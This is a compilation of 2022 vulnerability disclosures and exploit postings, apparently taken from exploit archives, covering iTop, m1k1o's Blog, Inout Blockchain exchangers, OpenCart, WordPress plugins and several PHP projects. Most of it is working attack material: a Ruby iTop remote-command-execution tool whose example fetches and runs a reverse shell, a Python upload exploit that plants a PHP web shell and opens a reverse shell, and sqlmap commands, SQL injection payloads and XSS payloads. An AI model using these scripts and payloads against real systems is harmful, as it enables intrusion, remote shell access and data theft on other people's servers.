Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.

**Project Name**

Online Birth Certificate System

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Last Updated**

09 December 2021

In Online Birth Certificate System we use PHP and MySQL Database. This project has two modules i.e. admin and user.

**Admin Module**

**1\. Home**:  In this section, admin can briefly view the total number of the new applications, total verified application and total rejected the application.

**2\. Birth Application:** In this section, admin views the application details and they have also the right to change application status according to current status.

**3\. Reports:** In this section admin can view the application details in a particular period.

**4\. Search:** In this section, admin can search application with the help of customer  application

Admin can also update his profile, change the password and recover the password.

**User Module**

**1.** **Home Page**: In this section, user can view the welcome page of the web application.

**2.Birth Reg Form**: In this section, user can fill the form of birth certificate and see the status of his/her application.

**3.Certificate:** In this section, user can take print of verified certificates.

Users can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Birth Certificate From**

**Admin Dashboard**

**Birth Certificate  
  
**

How to run the online Birth Certificate System Project

1.Download the zip file

2.Extract the file and copy obcs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name obcsdb

6.Import obcsdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/obcs

Admin Credential  
Username: admin  
Password: Test@123

User Credential  
Username: 9632123698  
Password: Test@12345

**View Demo** ——————————————————-

**Download full source code (Online Birth Certificate System)**

**Size: 12.1 MB**

**Version: V 1.2**

**Online Birth Certificate System Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-29005: Online Birth Certificate System Project Using PHP and MySQ -PhpGurukul

iTop versions prior to 2.7.5 authenticated remote command execution exploit.

#!/usr/bin/env ruby# Exploit## Title: iTop < 2.7.6 - (Authenticated) Remote command execution## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)## Author website: https://pwn.by/noraj/## Exploit source: https://github.com/Acceis/exploit-CVE-2022-24780## Date: 2022-05-20## Vendor Homepage: https://www.combodo.com/itop## Software Link: https://github.com/Combodo/iTop/archive/refs/tags/2.7.5.tar.gz## Version: 2.x < 2.7.6 and 3.x.x-beta < 3.0.0## Tested on: iTop version 2.7.4 (Ubuntu 18.04.4 LTS - 7.3.28)# Vulnerability## Discoverer: Markus KRELL## Date: 2021-10-04## Discoverer website: https://markus-krell.de/## Discovered on iTop 2.7.4-7194 and 3.0.0-beta-7312## Title: Server-Side Template Injection inside customer Portal## CVE: CVE-2022-24780## CWE: CWE-94, CWE-1336## Patch:##   - https://github.com/Combodo/iTop/commit/b6fac4b411b8d145fc30fa35c66b51243eafd06b##   - https://github.com/Combodo/iTop/commit/eb2a615bd28100442c7f6171707bb40884af2305##   - https://github.com/Combodo/iTop/commit/93f273a28778e5da8e51096f021d2dc1adbf4ef3## References:##   - https://nvd.nist.gov/vuln/detail/CVE-2022-24780##   - https://github.com/Combodo/iTop/security/advisories/GHSA-v97m-wgxq-rh54##   - https://markus-krell.de/itop-template-injection-inside-customer-portal/require 'httpx'require 'docopt'require 'nokogiri'doc = <<~DOCOPT  iTop < 2.7.6 - (Authenticated) Remote command execution  Usage:    #{__FILE__} full <url> <username> <password> <cmd> [--debug]    #{__FILE__} light <url> <username> <password> <cmd> [--debug]    #{__FILE__} -h | --help    full: exploit with an emulated browser, execute JavaScript, preserve original user profile information    light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) reset user information: phone, location, function  Options:    <url>       Root URL (base path) including HTTP scheme, port and root folder    <username>  iTop portal username    <password>  iTop portal user password    <cmd>       Command to execute on the target    --debug     Display arguments    -h, --help  Show this screen  Examples:    #{__FILE__} full http://example.org john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt'    #{__FILE__} light https://example.org:5000/itop john 's9nvEIZnEo6ghi' 'curl --remote-name http://pentest.example.com:7000/revshell.pl; perl revshell.pl'DOCOPTdef login(root_url, user, pass, http)  login_url = "#{root_url}/pages/UI.php"  params = {    'auth_user' => user,    'auth_pwd' => pass,    'login_mode' => 'form',    'loginop' => 'login'  }  http.post(login_url, form: params).body.to_senddef login_watir(root_url, user, pass, browser)  login_url = "#{root_url}/pages/UI.php"  browser.goto login_url  browser.text_field(id: 'user').set(user)  browser.text_field(id: 'pwd').set(pass)  browser.button(value: 'Enter iTop').clickenddef fetch_form(root_url, http)  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  # Fetch and parse HTML document  doc = Nokogiri.HTML5(http.get(profile_url).body.to_s)  action = doc.css('form').first['action']  transaction_id = doc.css('input[name="transaction_id"]').first['value']  form_id = doc.css('form').first['id']  # doesn't work because it's populated with javascript, we'll need watir for that  #phone = doc.css('input[id^=field_phone]').first['value']  #location = doc.css('select[id^=field_location_id] option[selected]').first['value']  #function = doc.css('input[id^=field_function]').first['value']  return {action: action, tid: transaction_id, fid: form_id}enddef exploit(root_url, cmd, http, browser)  form_data = fetch_form(root_url, http)  vuln_url = "#{root_url}#{form_data[:action]}"  user_info = browser.nil? ? {phone: '', location: '', function: ''} : fetch_form_js(root_url, browser)  params = {    'operation' => 'submit',    'stimulus_code' => '',    'transaction_id' => form_data[:tid],    # source data already escapes backslashes and double quotes for JSON    # so \ -> \\ and " -> \"    # but we need to esacpe backslash once for Ruby too because we need an interpolated string    # so \ -> \\ -> \\\\ and " -> \\"    'formmanager_class' => 'Combodo\iTop\Portal\Form\ObjectFormManager',    'formmanager_data' => %Q^{"id":"#{form_data[:fid]}","transaction_id":"#{form_data[:tid]}","formmanager_class":"Combodo\\\\iTop\\\\Portal\\\\Form\\\\ObjectFormManager","formrenderer_class":"Combodo\\\\iTop\\\\Renderer\\\\Bootstrap\\\\BsFormRenderer","formrenderer_endpoint":"#{form_data[:action]}","formobject_class":"Person","formobject_id":"1","formmode":"edit","formactionrulestoken":"","formproperties":{"id":"default-user-profile","type":"custom_list","fields":[],"layout":{"type":"twig","content":"<div class=\\"form_field\\" data-field-id=\\"first_name{{['#{cmd}']|filter('system')}}\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"name\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"org_id\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"email\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"phone\\"></div><div class=\\"form_field\\" data-field-id=\\"location_id\\"></div><div class=\\"form_field\\" data-field-id=\\"function\\"></div><div class=\\"form_field\\" data-field-id=\\"manager_id\\" data-field-flags=\\"read_only\\"></div>"}}}^,    'current_values[phone]' => user_info[:phone],    'current_values[location_id]' => user_info[:location],    'current_values[function]' => user_info[:function]  }  http.post(vuln_url, form: params).body.to_senddef fetch_form_js(root_url, browser)  # those values can't be fetched with nokogiri alone sicne they are populated using javascript  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  browser.goto profile_url  phone = browser.text_field(name: 'phone').value  location = browser.select(name: 'location_id').selected_options.first.value  function = browser.text_field(name: 'function').value  return {phone: phone, location: location, function: function}endbegin  args = Docopt.docopt(doc)  pp args if args['--debug']  http = HTTPX.plugin(:cookies)  login(args['<url>'], args['<username>'], args['<password>'], http)  if args['full']    require 'watir'    require 'webdrivers'    b = Watir::Browser.new :firefox    login_watir(args['<url>'], args['<username>'], args['<password>'], b)  elsif args['light']    b = nil  end  exploit(args['<url>'], args['<cmd>'], http, b)rescue Docopt::Exit => e  puts e.messageend

iTop Remote Command Execution

m1k1o's Blog versions 1.3 and below suffer from an authenticated remote code execution vulnerability.

    # Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-01-06# Exploit Author: Malte V# Vendor Homepage: https://github.com/m1k1o/blog# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip# Version: 1.3 and below# Tested on: Linux# CVE : CVE-2022-23626import argparseimport jsonimport refrom base64 import b64encodeimport requests as reqfrom bs4 import BeautifulSoupparser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',                    required=False)parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,                    required=False)parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,                    required=False)parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)args = vars(parser.parse_args())username = args['username']password = args['password']lhost_ip = args['ip']lhost_port = args['lport']address = args['url']port = args['port']url = f"http://{address}:{port}"blog_cookie = ""csrf_token = ""exploit_file_name = ""header = {    "Host": f"{address}",    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",    "X-Requested-With": "XMLHttpRequest",    "Csrf-Token": f"{csrf_token}",    "Cookie": f"PHPSESSID={blog_cookie}"}def get_cookie(complete_url):    global blog_cookie    cookie_header = {}    if not blog_cookie:        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"    result = req.get(url=complete_url, headers=cookie_header)    if result.status_code == 200:        blog_cookie = result.cookies.get_dict()['PHPSESSID']        print(f'[+] Found PHPSESSID: {blog_cookie}')        grep_csrf(result)def grep_csrf(result):    global csrf_token    csrf_regex = r"[a-f0-9]{10}"    soup = BeautifulSoup(result.text, 'html.parser')    script_tag = str(soup.findAll('script')[1].contents[0])    csrf_token = re.search(csrf_regex, script_tag).group(0)    print(f'[+] Found CSRF-Token: {csrf_token}')def login(username, password):    get_cookie(url)    login_url = f"{url}/ajax.php"    login_data = f"action=login&nick={username}&pass={password}"    login_header = {        "Host": f"{address}",        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    result = req.post(url=login_url, headers=login_header, data=login_data)    soup = BeautifulSoup(result.text, 'html.parser')    login_content = json.loads(soup.text)    if login_content.get('logged_in'):        print('[*] Successful login')    else:        print('[!] Bad login')def set_cookie(result):    global blog_cookie    blog_cookie = result.cookies.get_dict()['PHPSESSID']def generate_payload(command):    return f"""-----------------------------13148889121752486353560141292Content-Disposition: form-data; name="file"; filename="malicious.gif.php"Content-Type: application/x-httpd-phpGIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;-----------------------------13148889121752486353560141292--"""def send_payload():    payload_header = {        "Host": f"{address}",        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"    payload = generate_payload(command)    print(f"[+] Upload exploit")    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})    set_exploit_file_name(result.content.decode('ascii'))def set_exploit_file_name(data):    global exploit_file_name    file_regex = r"[a-zA-Z0-9]{4,5}.php"    exploit_file_name = re.search(file_regex, data).group(0)def call_malicious_php(file_name):    global header    complete_url = f"{url}/data/i/{file_name}"    print('[*] Calling reverse shell')    result = req.get(url=complete_url)def check_reverse_shell():    yes = {'yes', 'y', 'ye', ''}    no = {'no', 'n'}    choice = input("Have you got an active netcat listener (y/Y or n/N): ")    if choice in yes:        return True    elif choice in no:        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")        return Falsedef main():    enabled_listener = check_reverse_shell()    if enabled_listener:        login(username, password)        send_payload()        call_malicious_php(exploit_file_name)if __name__ == "__main__":    main()

m1k1o's Blog 1.3 Remote Code Execution

Blockchain FiatExchanger version 2.2.1 suffers from a remote blind SQL injection vulnerability.

# Information  
```  
Vulnerability Name  : Remote Blind SQL Injections in Inout Blockchain FiatExchanger  
Product             : Inout Blockchain FiatExchanger  
version             : 2.2.1  
Date                : 2022-05-21  
Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/  
Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md  
CVE-Number          : In Progess  
Exploit Author      : Mohamed N. Ali @MohamedNab1l  
```  
<br>

# Description  
<br>

SQL injection attack has been discovered in Blockchain FiatExchanger v2.2.1 platform. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  
<br>

## Vulnerable Parameter: symbol (GET)

<br>

Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php line 130

<br>

### Sqlmap command:  
`  
python sqlmap.py -u "http://http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user

`  
<br>

### output:  
`  
[20:05:54] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20(Windows NT 5.1; U; en)' from file '/root/sqlmap/data/txt/user-agents.txt'  
[20:05:55] [INFO] testing connection to the target URL  
[20:05:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests  
sqlmap resumed the following injection point(s) from stored session:

Parameter: symbol (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB

[20:05:55] [INFO] testing MySQL  
[20:05:56] [INFO] confirming MySQL  
[20:05:57] [INFO] the back-end DBMS is MySQL  
[20:05:57] [INFO] fetching banner  
[20:05:57] [INFO] resumed: '5.6.50'  
web application technology: PHP 7.0.33  
back-end DBMS: MySQL >= 5.0.0  
banner: '5.6.50'  
[20:05:57] [INFO] fetching current user  
[20:05:57] [INFO] retrieved: 'root@localhost'  
current user: 'root@localhost'  
[20:05:57] [INFO] fetching current database  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
current database: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] fetching database names  
[20:05:57] [INFO] resumed: 'information_schema'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] resumed: 'mysql'  
[20:05:57] [INFO] resumed: 'performance_schema'  
available databases [6]:  
[*] information_schema  
[*] inout_blockchain_fiatexchanger_addons_db  
[*] inout_blockchain_fiatexchanger_cryptotrading_db  
[*] inout_blockchain_fiatexchanger_db  
[*] mysql  
[*] performance_schema

`  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap1.png">  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap2.png">  
<br>

## Timeline  
```  
2022-05-03: Discovered the bug  
2022-05-03: Reported to vendor  
2022-05-21: Advisory published  
```

<br>

## Discovered by  
```  
Mohamed N. Ali  
@MohamedNab1l  
ali.mohamed@gmail.com

```

Blockchain FiatExchanger 2.2.1 SQL Injection

Blockchain AltExchanger version 1.2.1 suffers from multiple remote SQL injection vulnerabilities.

    # Information```Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchangerProduct             : Inout Blockchain AltExchangerversion             : 1.2.1Date                : 2022-05-21Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.mdCVE-Number          : In ProgessExploit Author      : Mohamed N. Ali @MohamedNab1l```<br># Description<br>Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.<br>## 1- Vulnerable Parameter: symbol (GET)<br>Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php<br>### Sqlmap command:`python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db`<br>### output:`Parameter: symbol (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO[16:43:22] [INFO] testing MySQL[16:43:23] [INFO] confirming MySQL[16:43:26] [INFO] the back-end DBMS is MySQL[16:43:26] [INFO] fetching banner[16:43:26] [INFO] resumed: 5.6.50web application technology: PHP 7.0.33back-end DBMS: MySQL >= 5.0.0banner: '5.6.50'[16:43:26] [INFO] fetching current database[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_dbcurrent database: 'inout_blockchain_altexchanger_db'`<br><img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"><br>## 2- Vulnerable Parameter: marketcurrency (POST)<br>Vulnerability File: /index.php/coins/update_marketboxslider<br>### HTTP Request:----------------------------------------------------`POST /index.php/coins/update_marketboxslider HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://vulnerable-host.com/Cookie: inoutio_language=4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: vulnerable-host.comConnection: Keep-alivedisplaylimit=4&marketcurrency=-INJEQT-SQL-HERE`----------------------------------------------------<br>## 3- Vulnerable Parameter: Cookie: inoutio_language (GET)<br>Vulnerability File: /index.php<br>### HTTP Request:----------------------------------------------------`GET /index.php/home/about HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36x-requested-with: XMLHttpRequestCookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: vulnerable-host.comConnection: Keep-alive`----------------------------------------------------<br>## Timeline```2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published```<br>## Discovered by```Mohamed N. Ali@MohamedNab1lali.mohamed at gmail.com```

Blockchain AltExchanger 1.2.1 SQL Injection

OpenCart Newsletter module version 3.0.2.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi# Date: 19/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez# Version: v.3.0.2.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivezemez_newsletter_email=saud===========Output :Parameter: zemez_newsletter_email (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

OpenCart Newsletter 3.0.2.0 SQL Injection

A vulnerability, which was classified as problematic, has been found in Zoo Management System 1.0. Affected by this issue is /zoo/admin/public_html/view_accounts?type=zookeeper of the content module. The manipulation of the argument admin_name with the input <script>alert(1)</script> leads to an authenticated cross site scripting. Exploit details have been disclosed to the public.

**Zoo Management System - 'admin\_name' Stored Cross-Site Scripting(XSS)****Exploit Title: Zoo Management System - 'admin\_name' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html****Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database****Version: Zoo Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Zoo Management System does not filter the content correctly at the "content" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Admin Default Access: Email: admin@mail.com Password: Password@123
    
2.  Open Page http://172.24.5.102/zoo/admin/public\_html/view\_accounts?type=zookeeper and click Edit button
    
3.  Put XSS payload (<script>alert(111)</script>) in the content box and click on Edit Account to publish the page
    

4.  Viewing the successfully published page,We can see the alert.

CVE-2022-1816: webray.com.cn/Zoo-Management-System(XSS).md at main · Xor-Gerke/webray.com.cn

Cross-site Scripting (XSS) - Reflected in GitHub repository collectiveaccess/providence prior to 1.8.

**Description**

Hello , i found an authenticated reflected xss via path fragment this was exploitable through trusting user input in url path fragement , please note : if you wrote a different payload you need to URL Encode the payload twice

**Proof of Concept**

    Enter this url : https://demo.collectiveaccess.org/index.php/system/Error/Show/n/3250%22%253CScRiPt%2520%253Ealert(%221337%22)%253C%252FsCripT%253E
    

**Picture:**

Kind Regards,

Rawi (@0xRaw)

**Impact**

Steal User Cookies or redirect user to malicious sites

CVE-2022-1825: Reflected XSS in providence

The Curtain WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks when the unfiltered_html capability is disallowed

    # Exploit Title: Multiple Stored Cross-Site Scripting vulnerabilitiesin WordPress curtain plugin 1.0.2# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/curtain/# Version: 1.0.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# DescriptionSeveral Cross-Site Scripting vulnerabilities in the Curtain WordPressplugin. Due to these Cross-Site Scripting vulnerabilities, an attackerwould be able to steal cookies, hijack sessions,s or control the browser ofthe victim.*Reproduce XSS in Heading Section:*1- Login to your WordPress Application2- Install curtain plugin3- Open the pagehttp://wordpressURL/wp-admin/options-general.php?page=curtain4- Inject Payload in Heading"><h1 onclick=alert(1)>XSS</h1>5- An alert will trigger.*Reproduce XSS in Managers Textarea Section:*1- Login to your WordPress Application2- Install curtain plugin3- Open the pagehttp://wordpressURL/wp-admin/options-general.php?page=curtain4- Inject Payload in Managers as"></textarea><script>alert(1)</script>5- An alert will trigger.

CVE-2022-1558: WordPress Curtain 1.0.2 Cross Site Scripting ≈ Packet Storm

Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites.
The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity.
The backdoor, which is believed to have existed since version 8.9, enables "an

Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites.

The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity.

The backdoor, which is believed to have existed since version 8.9, enables "an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed," Jetpack's Harald Eilertsen said in a Friday write-up.

School Management, developed by an India-based company called Weblizar, is billed as a Wordpress add-on to "manage complete school operation." It also claims more than 340,000 customers of its premium and free WordPress themes and plugins.

The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of the plugin. The free version of School Management, which doesn't pack the licensing code, is not impacted.

While the backdoor has since been removed, the exact origins of the compromise remains unclear, with the vendor stating that "they do not know when or how the code came into their software."

Customers of the plugin are recommended to update to the latest version (9.9.7) to prevent active exploitation attempts.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#php